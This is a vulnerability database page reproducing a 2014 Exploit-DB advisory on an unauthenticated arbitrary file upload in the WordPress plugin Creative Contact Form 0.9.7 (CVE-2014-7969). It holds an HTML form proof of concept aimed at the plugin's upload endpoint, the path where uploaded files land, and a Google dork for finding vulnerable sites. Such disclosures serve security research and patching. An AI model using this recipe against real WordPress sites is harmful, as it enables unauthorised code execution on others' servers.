Lucene search
K

WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

🗓️ 08 Oct 2014 00:00:00Reported by Gianni AngelozziType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload by Gianni Angelozzi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-7969
20 Jun 202219:53
circl
CVE
CVE-2014-7969
11 Feb 202017:56
cve
Cvelist
CVE-2014-7969
11 Feb 202017:56
cvelist
exploitpack
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
8 Oct 201400:00
exploitpack
Tenable Nessus
Creative Contact Form Component for Joomla! File Upload RCE
24 Nov 201400:00
nessus
Tenable Nessus
Creative Contact Form Plugin for WordPress File Upload RCE
24 Nov 201400:00
nessus
NVD
CVE-2014-7969
11 Feb 202018:15
nvd
Prion
Design/Logic Flaw
11 Feb 202018:15
prion
seebug.org
Creative Contact Form - Arbitrary File Upload
13 Nov 201400:00
seebug
==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" -
Arbitrary File Upload

# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"

This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload

<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Then the file is accessible under

http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF


Thanks,

Gianni Angelozzi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation